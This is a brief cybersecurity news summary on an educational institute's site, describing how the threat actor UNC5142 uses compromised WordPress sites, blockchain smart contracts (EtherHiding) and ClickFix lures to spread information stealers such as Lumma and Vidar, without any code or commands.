IGMPI facebook UNC5142 Exploits Blockchain and WordPress to Spread Info Stealers
IGMPI Logo
Faculty of Cybersecurity Technology

(An Autonomous Body Recognized by Ministry of Commerce & Industry, Government of India)

Competency based placement focussed Education | Training | Research | Consultancy

ADMISSIONS NOTICE
18001031071 (Toll Free), +91 11 26512850
Regular | Part-time (Online Live Classes) Modes
UNC5142 Exploits Blockchain and WordPress to Spread Info Stealers

UNC5142 Exploits Blockchain and WordPress to Spread Info Stealers

The financially motivated threat actor UNC5142 has been leveraging compromised WordPress websites and blockchain smart contracts to distribute malware targeting Windows and macOS systems. Key malware families include Atomic (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar. Using the EtherHiding technique, UNC5142 hides malicious code in smart contracts on BNB Smart Chain, providing resilience, anonymity, and the ability to update payloads with minimal cost. The attack chain begins with a JavaScript downloader, CLEARSHORT, injected into plugin, theme, or database files on compromised sites. This downloader interacts with smart contracts to fetch landing pages employing ClickFix social engineering tactics, tricking users into running malicious commands via Windows Run or macOS Terminal. Payloads are executed in memory, bypassing disk-based defenses, and ultimately deliver credential and cryptocurrency stealers. Since November 2024, UNC5142 has adopted a multi-contract Router-Logic-Storage architecture to improve agility and operational resilience. The campaign has targeted thousands of websites, reflecting both technical sophistication and likely success in malware distribution.

16-10-2025

đź“° Recent News